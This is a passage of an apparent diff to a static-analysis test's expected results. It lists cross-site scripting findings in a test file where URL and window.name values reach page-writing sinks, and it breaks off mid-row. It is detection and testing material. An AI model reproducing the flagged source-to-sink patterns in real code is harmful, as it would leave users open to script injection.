tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... .search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... .search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... .search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... .search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... .search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to 